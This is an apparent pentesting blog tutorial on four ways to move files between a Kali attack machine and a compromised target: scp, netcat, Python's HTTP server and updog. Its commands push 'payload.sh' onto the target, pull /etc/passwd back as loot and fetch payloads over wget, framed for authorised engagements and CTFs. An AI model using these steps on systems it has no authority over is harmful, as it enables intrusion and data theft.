Transfer Files Between Kali and a Target

Transfer Files Between Kali and a Target — 4 Ways Every Pentester Should Know


You've landed on a target. You need to push a payload over, or pull a loot file back to your Kali box. The question every pentester runs into eventually is: which transfer method should I use? The answer depends on what you have available — credentials, network reach, available tools on the target. Here are the four techniques I reach for the most, ranked roughly from "you have credentials" to "you have nothing but a shell".


> Prefer video? I walk through all four end-to-end on (https://www.youtube.com/@guskhawaja).



When to Use Which

| `scp` | You already have SSH credentials | 

| `netcat` | No SSH, but TCP works |

| `python3 -m http.server` | Target has Python and can reach you |

| `updog` | You also need the target to upload files back |


I'll cover each one with a real command you can copy and paste.


Method 1 — `scp` (Secure Copy)

If you have SSH access to the target — meaning a working username and password (or key) — `scp` is the cleanest option. It's encrypted, it preserves file permissions and timestamps, and it's available on practically every Linux box without installing anything.

scp payload.sh user@10.0.0.50:/tmp/


Hit enter, type the password, and the file lands on the target. The syntax is `scp <local-file> <user>@<host>:<remote-path>`. To pull a file from the target back to Kali, swap the order:

scp user@10.0.0.50:/etc/passwd ./loot/


Trade-offs: Requires working SSH credentials. If SSH is firewalled off or you're working from a limited shell that doesn't have an SSH client, scp won't help you.


Method 2 — `netcat` (Raw TCP Transfer)

When SSH is off the table but you can still open arbitrary TCP connections between the boxes, `netcat` is the no-frills option. It needs nothing on either side except `nc` itself, which is on most Linux installs by default.

On the target — start a listener that writes incoming bytes to a file:

nc -lvnp 4444 → received.sh

(That's a redirect from netcat into the file — netcat reads from the network, the shell writes the bytes to disk.)


On Kali — push the file by piping it into netcat:

nc 10.0.0.50 4444 < payload.sh


When the local file ends, netcat closes the connection and both sides exit. The file is now on the target as `received.sh`.


Trade-offs: No encryption — anyone on the wire can see the file in plaintext. No integrity check either, so a corrupted transfer fails silently. Fine for CTF-style work or internal pentests where you're not trying to be quiet, but don't use it on engagements with strict OPSEC requirements.


Method 3 — Python's Built-in HTTP Server

This is my favorite when I need to push tools onto a target that has Python installed (and most Linux distros do). On Kali, navigate to the directory that holds your payloads and start a one-liner server:

cd ~/loot

python3 -m http.server 8000


You'll see something like:

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...


Now from the target, pull the file with `wget` or `curl`:

wget http://10.0.0.10:8000/payload.sh


Every file in the directory you started the server in is now downloadable. If you only need to host one file, drop the payload into a clean directory first so you don't accidentally serve `id_rsa`.


Trade-offs: One-way (target pulls from Kali). HTTP is plaintext. Anyone with network access to your Kali box on port 8000 can browse the same files — pick a directory carefully.


Method 4 — `updog` (Python HTTP Server with Upload)

`updog` is the same idea as `python3 -m http.server`, but with a clean web interface and — most importantly — a built-in upload form. That makes it bidirectional: the target can pull files *and* push files back to you, no extra commands required.


Install it once:

pip3 install updog


Run it:

updog --port 9090


You'll see:

[+] Serving /home/kali/loot through http://0.0.0.0:9090


From a browser on the target, point at `http://10.0.0.10:9090`. You'll get a file listing where you can click any file to download, plus an upload area where you can drag and drop a file to send it back to Kali.


Trade-offs: Requires installing one extra Python package on Kali. Still HTTP by default — pass `--ssl` and a cert if you need TLS. The web UI means the target needs a browser (or any HTTP client that can do `multipart/form-data` POSTs for uploads).


Picking the Right Tool

In practice you'll combine these. A typical engagement flow looks like:


1. Get an initial foothold via your exploit of choice.

2. Use `python3 -m http.server` or `updog` to drop a privilege-escalation script (`linpeas.sh`, `pspy`, etc.).

3. Run the script on the target, capture interesting findings.

4. Use `updog`'s upload form, or `scp` (once you've cracked an SSH cred), to bring the loot back.


Each tool fits a different rung of the post-exploitation ladder. The more of them you have in muscle memory, the less time you waste fighting the network when you should be focused on the target.


Comments

Post a Comment

Popular posts from this blog

How to Install a Printer on Kali Linux

Image
 Installing a printer on Kali Linux involves several steps. Before we start, ensure you have administrative privileges, as you'll need to run some commands as a superuser.   Prerequisites   1. Physical Connection : Make sure the printer is physically connected to the machine and turned on. 2. Driver : Check if your printer manufacturer provides a Linux driver. If not, you may still be able to use generic drivers. 3. Update Repositories : Make sure your package manager repositories are updated by running `sudo apt update`.   Step 1: Install CUPS (Common UNIX Printing System)   CUPS is a modular printing system that enables a computer to act as a print server. It's the most commonly used system for printing on Unix-based operating systems.   To install CUPS, open a terminal and run: sudo apt install cups   Step 2: Start and Enable CUPS Service   Once CUPS is installed, you'll need to start its service and enable i...
Read more

Sharing a Folder on Kali Linux

Image
  Sharing a folder over a network on Kali Linux can be efficiently accomplished using Samba, a re-implementation of the SMB/CIFS networking protocol. This guide will take you through the steps to set up a Samba share. Prerequisites 1. Administrative Privileges : You'll need to run commands as a superuser. 2. Folder to Share : Have a folder ready that you wish to share. If not, create one. 3. Network Access : Ensure that the Kali Linux machine is connected to the network where you want to share the folder. Step 1: Update Package Repositories Before installing any package, it's a good practice to update your package repositories: sudo apt update Step 2: Install Samba To install Samba, execute the following command: sudo apt install samba Step 3: Configure Samba The main configuration file for Samba is /etc/samba/smb.conf . You can edit this file to define your shares. First, backup the original configuration file: sudo cp /etc/samba/smb.conf /etc/samba/smb.conf.bak Now, edit ...
Read more

Listing Files and Folders in Kali Linux

Image
In the intricate world of ethical hacking, the computer is an indispensable ally. The ability to swiftly navigate through files and folders is a foundational skill that every hacker must master. The Kali Linux terminal, with its array of commands, offers the tools needed to achieve this mastery. Key Insights: The "ls" Command : One of the most frequently used commands in Kali Linux, the ls command allows users to list the files and folders in the current directory. When executed without any parameters, it displays items in the current directory, with folders appearing in blue and files in green. Discovering the Current Directory with the "pwd" Command : If you ever find yourself lost amidst the myriad of directories, the pwd command is your compass. It reveals the current directory you're in, ensuring you always know your location in the filesystem. Diving Deeper with the "ls -l" Option : For those w...
Read more